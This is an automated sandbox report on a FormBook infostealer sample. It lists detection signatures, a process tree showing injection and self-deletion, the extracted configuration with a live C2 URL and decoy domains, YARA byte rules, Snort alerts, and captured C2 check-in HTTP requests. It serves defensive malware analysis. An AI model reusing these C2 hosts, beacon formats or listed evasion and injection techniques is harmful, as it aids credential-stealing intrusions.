Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report WXs8v9QuE7.exe

Overview

General Information

Sample Name:WXs8v9QuE7.exe
Analysis ID:438542
MD5:1f45b0e2bd669bce49b2140373243a91
SHA1:6ea61f1b39548a8b9192c0606d6daeb2c071a190
SHA256:ef05dd27e2dc499d3c1f42f00525fea7204735acd45c7a03efb78a241a9f9660
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WXs8v9QuE7.exe (PID: 5432 cmdline: 'C:\Users\user\Desktop\WXs8v9QuE7.exe' MD5: 1F45B0E2BD669BCE49B2140373243A91)
    • WXs8v9QuE7.exe (PID: 5880 cmdline: 'C:\Users\user\Desktop\WXs8v9QuE7.exe' MD5: 1F45B0E2BD669BCE49B2140373243A91)
      • cscript.exe (PID: 1632 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
        • cmd.exe (PID: 1864 cmdline: /c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • autoconv.exe (PID: 5428 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.WXs8v9QuE7.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.WXs8v9QuE7.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.WXs8v9QuE7.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        1.1.WXs8v9QuE7.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.WXs8v9QuE7.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0WAvira URL Cloud: Label: phishing
          Found malware configurationShow sources
          Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: WXs8v9QuE7.exeVirustotal: Detection: 18%Perma Link
          Source: WXs8v9QuE7.exeReversingLabs: Detection: 19%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: WXs8v9QuE7.exeJoe Sandbox ML: detected
          Source: 18.2.cscript.exe.748a10.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 18.2.cscript.exe.4d87960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.1.WXs8v9QuE7.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.WXs8v9QuE7.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: WXs8v9QuE7.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cscript.pdbUGP source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: WXs8v9QuE7.exe, 00000000.00000003.228184886.0000000009990000.00000004.00000001.sdmp, WXs8v9QuE7.exe, 00000001.00000002.302101367.0000000000B8F000.00000040.00000001.sdmp, cscript.exe, 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: WXs8v9QuE7.exe, cscript.exe
          Source: Binary string: cscript.pdb source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 75.2.124.199:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 75.2.124.199:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 75.2.124.199:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49750 -> 23.225.101.32:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49750 -> 23.225.101.32:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49750 -> 23.225.101.32:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 94.136.40.51:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 94.136.40.51:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 94.136.40.51:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 45.192.104.89:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 45.192.104.89:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 45.192.104.89:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.oceancollaborative.com/bp3i/
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W HTTP/1.1Host: www.purpleqube.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0W HTTP/1.1Host: www.tori2020.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=80R/aSnQ9cMncl3xr61KDuAjYp2ZOr6pxPcjEdydNICfLnQ2vp9ekDHPlA0NjzWfFYRL&ApZx=O2MHiVr0W HTTP/1.1Host: www.underce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0W HTTP/1.1Host: www.fredrika-stahl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0W HTTP/1.1Host: www.doodstore.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0W HTTP/1.1Host: www.mutanterestaurante.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=zwAt45JEztQSRxPdch59MI6sbMm9ozxv/QrdgZuHtz8DMTYJ2HUJlOY3K2JoQYzD174Y&ApZx=O2MHiVr0W HTTP/1.1Host: www.9wsc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0W HTTP/1.1Host: www.5xlsteve.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd38qIM/2l+B&ApZx=O2MHiVr0W HTTP/1.1Host: www.oceancollaborative.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0W HTTP/1.1Host: www.motivactivewear.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W HTTP/1.1Host: www.purpleqube.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0W HTTP/1.1Host: www.tori2020.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=80R/aSnQ9cMncl3xr61KDuAjYp2ZOr6pxPcjEdydNICfLnQ2vp9ekDHPlA0NjzWfFYRL&ApZx=O2MHiVr0W HTTP/1.1Host: www.underce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0W HTTP/1.1Host: www.fredrika-stahl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0W HTTP/1.1Host: www.doodstore.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0W HTTP/1.1Host: www.mutanterestaurante.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=zwAt45JEztQSRxPdch59MI6sbMm9ozxv/QrdgZuHtz8DMTYJ2HUJlOY3K2JoQYzD174Y&ApZx=O2MHiVr0W HTTP/1.1Host: www.9wsc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0W HTTP/1.1Host: www.5xlsteve.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd38qIM/2l+B&ApZx=O2MHiVr0W HTTP/1.1Host: www.oceancollaborative.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0W HTTP/1.1Host: www.motivactivewear.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.reufhroir.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Jun 2021 16:25:18 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 62 70 33 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /bp3i/ was not found on this server.</p></body></html>
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: WXs8v9QuE7.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: WXs8v9QuE7.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
